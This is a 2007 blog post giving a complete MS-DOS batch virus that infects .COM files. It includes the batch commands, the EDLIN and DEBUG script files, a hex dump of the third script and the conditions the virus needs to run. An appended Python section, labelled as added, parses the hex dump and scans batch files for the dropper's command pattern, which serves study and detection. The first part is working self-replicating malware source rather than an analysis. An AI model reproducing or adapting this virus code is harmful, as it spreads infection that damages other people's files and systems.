Thursday, November 8, 2007

Batch Virus

Batch Virus?
The virus described here runs under MS-DOS. It is built entirely from batch commands plus the standard DEBUG and EDLIN utilities, which it drives through redirected input files.


ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (A names-only listing of the .COM files is redirected into the file IND)
EDLIN IND<1 (IND is processed with EDLIN so that only the file names remain)
DEBUG IND<2 (A new batch program is created with DEBUG)
EDLIN NAME.BAT<3 (EDLIN turns NAME.BAT into its final executable form)
CTTY CON (Console output is restored)
NAME (Newly created NAME.BAT is called)

In addition to this batch file, the virus uses three command (script) files, named 1, 2 and 3, which are fed to EDLIN and DEBUG through input redirection.
Here is the first command file:


1,4D (Lines 1-4 of the IND file are deleted)
E (Save file)

Here is the second command file:


M100,10B,F000 (The first program name is moved to address F000H for safekeeping)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
W (Write)
Q (Quit)

The third command file must be printed as a hex dump because it contains two control characters (1Ah = Ctrl-Z), which are not printable. Hex dump of the third command file:


0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

For this virus to work, VR.BAT must be in the root directory. The program only affects .COM files.
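For anyone triaging old DOS batch files, two small tools are useful: a parser for the DEBUG-style hex dump format used above (so the control characters the post mentions can be counted rather than eyeballed), and a heuristic scanner that flags the combination of commands this dropper relies on (console silenced with CTTY NUL, EDLIN and DEBUG driven by redirected scripts, a redirected listing of .COM files). The code below is an added example and is not part of the original post; the indicator names, the scoring threshold and the two sample batch texts are assumptions constructed for illustration. The hex dump fed to the parser is the post's own third command file.

```python
"""Analysis helpers for the batch-virus write-up: a DEBUG hex-dump parser and a
batch-file indicator scanner.  Added example, not from the original post."""
import re
from typing import Dict, List

# The post's hex dump of the third command file (DEBUG 'D' layout: 4-digit
# offset, eight bytes, a '-', eight more bytes).
HEXDUMP = """
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
"""

# Constructed sample batch texts (assumptions, not files from the post).
SUSPECT_BATCH = (
    "ECHO OFF\r\nCTTY NUL\r\nDIR *.COM/W>IND\r\n"
    "EDLIN IND<1\r\nDEBUG IND<2\r\nCTTY CON\r\n"
)
BENIGN_BATCH = "@ECHO OFF\r\nPATH C:\\MSDOS\r\nDIR *.COM /W\r\nECHO done\r\n"


def parse_debug_hexdump(text: str) -> bytes:
    """Turn a DEBUG-style hex dump into the raw bytes it describes."""
    out = bytearray()
    for line in text.strip().splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue  # blank or malformed line: skip
        offset, rest = parts
        if not re.fullmatch(r"[0-9A-Fa-f]{4}", offset):
            raise ValueError(f"bad offset field: {offset!r}")
        # DEBUG separates the two halves of a line with '-'; treat it as space.
        for tok in rest.replace("-", " ").split():
            out.append(int(tok, 16))
    return bytes(out)


def count_control_bytes(data: bytes) -> Dict[int, int]:
    """Count each byte value below 0x20 (the non-printable range)."""
    counts: Dict[int, int] = {}
    for b in data:
        if b < 0x20:
            counts[b] = counts.get(b, 0) + 1
    return counts


# Heuristic indicators (assumed names) for the dropper pattern in the post.
# Each is matched per line, case-insensitively, as DOS batch is case-blind.
INDICATORS = [
    ("console_off", re.compile(r"^\s*CTTY\s+NUL\b", re.I)),
    ("debug_scripted", re.compile(r"^\s*DEBUG\b.*<", re.I)),
    ("edlin_scripted", re.compile(r"^\s*EDLIN\b.*<", re.I)),
    ("com_listing_redirect", re.compile(r"^\s*DIR\b.*\*\.COM.*>", re.I)),
]


def scan_batch(text: str) -> List[str]:
    """Return the sorted names of indicators found anywhere in a batch text."""
    found = set()
    for line in text.splitlines():
        for name, pattern in INDICATORS:
            if pattern.search(line):
                found.add(name)
    return sorted(found)


def is_suspicious(text: str, threshold: int = 2) -> bool:
    """Single indicators are common in legitimate scripts; flag the combination.
    The threshold of 2 is an assumed tuning value."""
    return len(scan_batch(text)) >= threshold


if __name__ == "__main__":
    data = parse_debug_hexdump(HEXDUMP)
    ctl = count_control_bytes(data)
    print(f"{len(data)} bytes; Ctrl-Z (1Ah) occurs {ctl.get(0x1A, 0)} times; "
          f"CR (0Dh) {ctl.get(0x0D, 0)} times; NUL padding {ctl.get(0x00, 0)}")
    for label, sample in (("suspect", SUSPECT_BATCH), ("benign", BENIGN_BATCH)):
        print(label, scan_batch(sample), "suspicious" if is_suspicious(sample) else "clean")
```

Run as a script it reports the control-byte counts for the dump (two Ctrl-Z bytes, matching the post's remark) and the indicator hits for each sample. The scanner is deliberately a combination test: DEBUG and EDLIN with redirected input were ordinary DOS administration idioms, so a single hit is not worth an alert, but all four together in one file is the signature of this kind of dropper.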